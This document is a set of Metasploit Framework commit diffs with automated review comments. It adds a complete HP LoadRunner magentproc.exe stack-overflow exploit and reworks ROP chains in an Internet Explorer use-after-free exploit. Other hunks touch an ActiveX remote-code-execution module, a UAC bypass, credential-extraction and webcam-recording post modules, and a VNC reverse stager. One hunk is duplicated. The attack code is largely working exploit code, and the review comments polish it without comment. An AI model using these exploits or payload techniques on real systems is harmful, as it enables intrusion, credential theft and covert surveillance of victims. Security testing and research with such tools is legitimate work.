[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ] [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ]
@ -342,4 +343,4 @@ MSHTML!CTreeNode::GetInterface+0xd8:
66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] 66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]
66e13e01 ffd0 call eax 66e13e01 ffd0 call eax
=end =end


@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -109,85 +110,25 @@ class Metasploit3 < Msf::Exploit::Remote
nil nil
end end
def get_payload(t, cli) def get_payload(t)
rop = '' if t['Rop'] == :msvcrt
code = payload.encoded
esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
case t['Rop']
when :msvcrt
# Stack adjustment # add esp, -3500
esp_align = "\x81\xc4\x54\xf2\xff\xff"
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
rop = esp_align = "\x81\xc4\x54\xf2\xff\xff"
[ rop_dll = 'msvcrt'
0x77c1e844, # POP EBP # RETN [msvcrt.dll] opts = {'target'=>'xp'}
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
else else
print_status("Using JRE ROP") print_status("Using JRE ROP")
rop = esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
[ rop_dll = 'java'
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN opts = {}
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
end end
rop_payload = rop p = esp_align + payload.encoded + rand_text_alpha(12000)
rop_payload << esp_align generate_rop_payload(rop_dll, p, opts)
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
rop_payload
end
def junk
rand_text_alpha(4).unpack("V")[0].to_i
end
def nop
make_nops(4).unpack("V")[0].to_i
end end
def get_html(t, p) def get_html(t, p)
junk = rand_text_alpha(4).unpack("V")[0].to_i
js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*")) js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
js_payload = Rex::Text.to_unescape(p) js_payload = Rex::Text.to_unescape(p)
js_align = Rex::Text.to_unescape([t['Align']].pack("V*")) js_align = Rex::Text.to_unescape([t['Align']].pack("V*"))
@ -195,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
q_id = Rex::Text.rand_text_alpha(1) q_id = Rex::Text.rand_text_alpha(1)
html = %Q| %Q|
<!DOCTYPE html> <!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head> <head>
@ -244,8 +185,6 @@ class Metasploit3 < Msf::Exploit::Remote
<t:ANIMATECOLOR id="myanim"/> <t:ANIMATECOLOR id="myanim"/>
</html> </html>
| |
html
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
@ -253,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
t = get_target(agent) t = get_target(agent)
if t if t
p = get_payload(t, cli) p = get_payload(t)
html = get_html(t, p) html = get_html(t, p)
print_status("Sending exploit...") print_status("Sending exploit...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
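Review bot: In the rewritten `get_payload(t)`, the msvcrt `esp_align = "\x81\xc4\x54\xf2\xff\xff"` lost the `# Stack adjustment # add esp, -3500` comment the old code carried, while the java branch still annotates its own constant with `# sub esp, -10000`; restore the comment on that line. The 12000-byte `rand_text_alpha` is now appended for both ROP variants, where the old code skipped it for `:msvcrt`; if that is intended, a short comment on `p = esp_align + payload.encoded + rand_text_alpha(12000)` saying the padding is wanted in both cases will stop a future reader from reinstating the exclusion.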


@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -106,32 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
def get_payload(t) def get_payload(t)
rop =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
# This data should appear at the beginning of the target address (see TargetAddr in metadata) # This data should appear at the beginning of the target address (see TargetAddr in metadata)
p = '' p = ''
p << rand_text_alpha(225) # Padding to avoid null byte addr p << rand_text_alpha(225) # Padding to avoid null byte addr
@ -139,10 +114,9 @@ class Metasploit3 < Msf::Exploit::Remote
p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr) p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr)
p << [t['Pivot']].pack("V*") # Stack pivot p << [t['Pivot']].pack("V*") # Stack pivot
p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment
p << rop # ROP chain p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
p << payload.encoded # Actual payload
return p p
end end
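Review bot: The replaced lines carried `# ROP chain` and `# Actual payload` comments, and the single new line `p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})` has none, so the reader no longer sees that both the chain and the payload land here; append `# ROP chain (RopDb msvcrt/xp) followed by the payload` to that line. The earlier hunk's `include Msf::Exploit::RopDb` is what supplies `generate_rop_payload`.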


@ -26,9 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution", 'Name' => "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",
'Description' => %q{ 'Description' => %q{
This module exploits the SEListCtrlX ActiveX installed with the SIEMENS Solid Edge product. This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.
The vulnerability exists on several APIs provided by the control, where user supplied input The vulnerability exists on several APIs provided by the control, where user supplied input
is handled as a memory pointer without proper validation, allowing an attacker to read and is handled as a memory pointer without proper validation, allowing an attacker to read and
corrupt memory from the target process. This module abuses the methods NumChildren() and corrupt memory from the target process. This module abuses the methods NumChildren() and
@ -497,4 +497,4 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, html, {'Content-Type'=>'text/html'}) send_response(cli, html, {'Content-Type'=>'text/html'})
end end
end end


@ -81,9 +81,7 @@ class Metasploit3 < Msf::Exploit::Local
print_good "UAC is set to Default" print_good "UAC is set to Default"
print_good "BypassUAC can bypass this setting, continuing..." print_good "BypassUAC can bypass this setting, continuing..."
when 0 when 0
print_error "UAC is not enabled, no reason to run module" print_warning "Could not determine UAC level - attempting anyways..."
print_error "Run exploit/windows/local/ask to elevate"
return
end end
# Check if you are an admin # Check if you are an admin
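Review bot: The new `when 0` message `print_warning "Could not determine UAC level - attempting anyways..."` describes the value as unknown, whereas the text it replaces treated 0 as UAC disabled; the `case` this branch belongs to starts before the hunk, so I cannot tell from here which reading matches how the value is obtained. If 0 is the reported value for a disabled UAC, the message misstates the system state; `print_warning "UAC level reported as 0 (disabled or unreadable) - attempting anyway..."` covers both readings without asserting either. Minor: "anyway" rather than "anyways".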


@ -0,0 +1,83 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP LoadRunner magentproc.exe Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' =>
[
'Unknown', # Original discovery # From Tenable Network Security
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-4800'],
['OSVDB', '95644'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
],
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'SSL3',
'PrependMigrate' => true
},
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows XP SP3 / HP LoadRunner 11.50',
{
# magentproc.exe 11.50.2042.0
'Offset' => 1104,
'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
'Crash' => 6000 # Length needed to ensure an exception
}
]
],
'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(443)], self.class)
end
def exploit
req = [0xffffffff].pack("N") # Fake Length
req << rand_text(target['Offset'])
req << generate_seh_record(target.ret)
req << payload.encoded
req << rand_text(target['Crash'])
connect
print_status("Sending malicious request...")
sock.put(req)
disconnect
end
end
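Review bot: `'SSLVersion' => 'SSL3'` in `DefaultOptions` pins a protocol version with no comment on why, so whoever later sees SSLv3 dropped from the framework's defaults has nothing to go on; add a why-comment on that line such as `# SSL3 required by the agent on the tested build - confirm` (hedged, since nothing in the module shows what the agent negotiates). The author entry `'Unknown', # Original discovery # From Tenable Network Security` chains two `#` fragments; a single comment, `# Original discovery (reported via Tenable Network Security)`, reads cleaner.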


@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
connect connect
sock.put(ping_request) sock.put(ping_request)
res = sock.get_once(-1, 1) res = sock.get_once
disconnect disconnect
return res return res
@ -162,7 +162,7 @@ user-agent: BBC 11.00.044; 14
print_status("#{peer} - Sending HTTP Expect...") print_status("#{peer} - Sending HTTP Expect...")
sock.put(http_headers) sock.put(http_headers)
res = sock.get_once(-1, 1) res = sock.get_once
if not res or res !~ /HTTP\/1\.1 100 Continue/ if not res or res !~ /HTTP\/1\.1 100 Continue/
print_error("#{peer} - Failed while sending HTTP Expect Header") print_error("#{peer} - Failed while sending HTTP Expect Header")
return return


@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
connect connect
sock.put(ping_request) sock.put(ping_request)
res = sock.get_once(-1, 1) res = sock.get_once
disconnect disconnect
return res return res
@ -162,7 +162,7 @@ user-agent: BBC 11.00.044; 14
print_status("#{peer} - Sending HTTP Expect...") print_status("#{peer} - Sending HTTP Expect...")
sock.put(http_headers) sock.put(http_headers)
res = sock.get_once(-1, 1) res = sock.get_once
if not res or res !~ /HTTP\/1\.1 100 Continue/ if not res or res !~ /HTTP\/1\.1 100 Continue/
print_error("#{peer} - Failed while sending HTTP Expect Header") print_error("#{peer} - Failed while sending HTTP Expect Header")
return return


@ -17,7 +17,7 @@ module Metasploit3
'Name' => 'OS X x64 Execute Command', 'Name' => 'OS X x64 Execute Command',
'Description' => 'Execute an arbitrary command', 'Description' => 'Execute an arbitrary command',
'Author' => [ 'argp <argp[at]census-labs.com>', 'Author' => [ 'argp <argp[at]census-labs.com>',
'joev <jvennix[at]rapid7.com>' ], 'joev' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X86_64 'Arch' => ARCH_X86_64


@ -30,7 +30,7 @@ module Metasploit3
[ [
'snagg <snagg[at]openssl.it>', 'snagg <snagg[at]openssl.it>',
'argp <argp[at]census-labs.com>', 'argp <argp[at]census-labs.com>',
'joev <jvennix[at]rapid7.com>' 'joev'
], ],
'License' => BSD_LICENSE, 'License' => BSD_LICENSE,
'Platform' => 'osx', 'Platform' => 'osx',


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
'Author' => 'Author' =>
[ [
"Jann Horn", # discovery "Jann Horn", # discovery
"joev <jvennix[at]rapid7.com>" # metasploit module "joev" # metasploit module
], ],
'DisclosureDate' => 'Nov 20 2012', 'DisclosureDate' => 'Nov 20 2012',
'Platform' => %w{ linux osx } 'Platform' => %w{ linux osx }


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post
command using -e, so the payload never hits the disk. command using -e, so the payload never hits the disk.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' => [ 'joev'],
'Platform' => [ 'osx'], 'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ] 'SessionTypes' => [ 'shell', 'meterpreter' ]
)) ))


@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' => [
'Joff Thyer <jsthyer[at]gmail.com>', # original post module 'Joff Thyer <jsthyer[at]gmail.com>', # original post module
'joev <jvennix[at]rapid7.com>' # bug fixes 'joev' # bug fixes
], ],
'Platform' => [ 'osx' ], 'Platform' => [ 'osx' ],
'References' => [ 'References' => [


@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
capture (with the RECORD action) audio inputs on a remote OSX machine. capture (with the RECORD action) audio inputs on a remote OSX machine.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' => [ 'joev'],
'Platform' => [ 'osx'], 'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ], 'SessionTypes' => [ 'shell', 'meterpreter' ],
'Actions' => [ 'Actions' => [


@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
record a webcam and mic (with the RECORD action) record a webcam and mic (with the RECORD action)
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' => [ 'joev'],
'Platform' => [ 'osx'], 'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ], 'SessionTypes' => [ 'shell', 'meterpreter' ],
'Actions' => [ 'Actions' => [


@ -14,9 +14,9 @@ class Metasploit3 < Msf::Post
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => 'Windows Gather Dyn-Dns Client Password Extractor', 'Name' => 'Windows Gather DynDNS Client Password Extractor',
'Description' => %q{ 'Description' => %q{
This module extracts the username, password, and hosts for Dyn-Dns version 4.1.8. This module extracts the username, password, and hosts for DynDNS version 4.1.8.
This is done by downloading the config.dyndns file from the victim machine, and then This is done by downloading the config.dyndns file from the victim machine, and then
automatically decode the password field. The original copy of the config file is also automatically decode the password field. The original copy of the config file is also
saved to disk. saved to disk.


@ -92,7 +92,7 @@ class Metasploit3 < Msf::Post
print_good("Successfully injected Meterpreter in to process: #{target_pid}") print_good("Successfully injected Meterpreter in to process: #{target_pid}")
rescue::Exception => e rescue::Exception => e
print_error("Failed to Inject Payload to #{target_pid}!") print_error("Failed to Inject Payload to #{target_pid}!")
print_error(e) print_error(e.message)
end end
end end
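Review bot: The new `print_error(e.message)` sits inside a `rescue ::Exception => e` clause, which also catches `Interrupt`, `SystemExit` and `NoMemoryError`, so a Ctrl-C during injection is reported as "Failed to Inject Payload" and swallowed instead of propagating. Narrowing the clause to `rescue ::StandardError => e` (or to the specific error classes the injection call raises, if known) keeps the improved message and lets control signals through. The enclosing method starts before the hunk, so whether the failure is otherwise surfaced to the caller cannot be seen here.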


@ -95,7 +95,7 @@ if (tunnel)
pay.datastore['LPORT'] = rport pay.datastore['LPORT'] = rport
pay.datastore['VNCPORT'] = vport pay.datastore['VNCPORT'] = vport
else else
print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport})") print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport}")
payload = "windows/vncinject/reverse_tcp" payload = "windows/vncinject/reverse_tcp"
pay = client.framework.payloads.create(payload) pay = client.framework.payloads.create(payload)


@ -12,6 +12,8 @@ describe Msf::Util::EXE do
described_class described_class
end end
before { pending "Pending RM#8463, fix all these these tests up." }
$framework = Msf::Simple::Framework.create( $framework = Msf::Simple::Framework.create(
:module_types => [ Msf::MODULE_NOP ], :module_types => [ Msf::MODULE_NOP ],
'DisableDatabase' => true 'DisableDatabase' => true


@ -0,0 +1,91 @@
require 'rex/exploitation/ropdb'
describe Rex::Exploitation::RopDb do
context "Class methods" do
context ".initialize" do
it "should initialize with a path of the ROP database ready" do
ropdb = Rex::Exploitation::RopDb.new
ropdb.instance_variable_get(:@base_path).should =~ /data\/ropdb\/$/
end
end
context ".has_rop?" do
ropdb = Rex::Exploitation::RopDb.new
it "should find the msvcrt ROP database" do
ropdb.has_rop?("msvcrt").should eq(true)
end
it "should find the java ROP database" do
ropdb.has_rop?("java").should eq(true)
end
it "should find the hxds ROP database" do
ropdb.has_rop?("hxds").should eq(true)
end
it "should find the flash ROP database" do
ropdb.has_rop?("flash").should eq(true)
end
it "should return false when I supply an invalid database" do
ropdb.has_rop?("sinn3r").should eq(false)
end
end
context ".select_rop" do
ropdb = Rex::Exploitation::RopDb.new
it "should return msvcrt gadgets" do
gadgets = ropdb.select_rop('msvcrt')
gadgets.length.should > 0
end
it "should return msvcrt gadgets for windows server 2003" do
gadgets = ropdb.select_rop('msvcrt', {'target'=>'2003'})
gadgets.length.should > 0
end
it "should return msvcrt gadgets with a new base" do
gadgets1 = ropdb.select_rop('msvcrt')
gadgets2 = ropdb.select_rop('msvcrt', {'base'=>0x10000000})
gadgets2[0].should_not eq(gadgets1[0])
end
end
context ".generate_rop_payload" do
ropdb = Rex::Exploitation::RopDb.new
it "should generate my ROP payload" do
ropdb.generate_rop_payload('msvcrt', 'AAAA').should =~ /AAAA$/
end
it "should generate my ROP payload with my stack pivot" do
ropdb.generate_rop_payload('msvcrt', 'AAAA', {'pivot'=>'BBBB'}).should =~ /^BBBB/
end
end
context ".get_safe_size" do
ropdb = Rex::Exploitation::RopDb.new
it "should return 0xfffffed0 (value does not need to be modified to avoid null bytes)" do
ropdb.send(:get_safe_size, 304).should eq(0xfffffed0)
end
it "should return 0xfffffeff (value is modified to avoid null bytes)" do
ropdb.send(:get_safe_size, 256).should eq(0xfffffeff)
end
end
context ".get_unsafe_size" do
ropdb = Rex::Exploitation::RopDb.new
it "should return 0xfffffc00 (contains a null byte)" do
ropdb.send(:get_unsafe_size, 1024).should eq(0xfffffc00)
end
end
end
end
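Review bot: Each `context` (`.has_rop?`, `.select_rop`, `.generate_rop_payload`, `.get_safe_size`, `.get_unsafe_size`) creates its `ropdb` with a bare assignment at definition time, so the instance is built once when the spec file loads and shared by every example, and a constructor failure aborts loading the whole file rather than failing the examples that need it. A single `let(:ropdb) { Rex::Exploitation::RopDb.new }` at the top of the `describe` gives each example a fresh instance and removes the five duplicated assignments. The `.initialize` example also reads `@base_path` through `instance_variable_get`, which ties the spec to a private name; if RopDb exposes the path through a reader, asserting on that would survive a rename.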


@ -361,12 +361,16 @@ class Msftidy
warn("Spaces at EOL", idx) warn("Spaces at EOL", idx)
end end
# Allow tabs or spaces as indent characters, but not both. # Check for mixed tab/spaces. Upgrade this to an error() soon.
# This should check for spaces only on October 8, 2013
if (ln.length > 1) and (ln =~ /^([\t ]*)/) and ($1.match(/\x20\x09|\x09\x20/)) if (ln.length > 1) and (ln =~ /^([\t ]*)/) and ($1.match(/\x20\x09|\x09\x20/))
warn("Space-Tab mixed indent: #{ln.inspect}", idx) warn("Space-Tab mixed indent: #{ln.inspect}", idx)
end end
# Check for tabs. Upgrade this to an error() soon.
if (ln.length > 1) and (ln =~ /^\x09/)
warn("Tabbed indent: #{ln.inspect}", idx)
end
if ln =~ /\r$/ if ln =~ /\r$/
warn("Carriage return EOL", idx) warn("Carriage return EOL", idx)
end end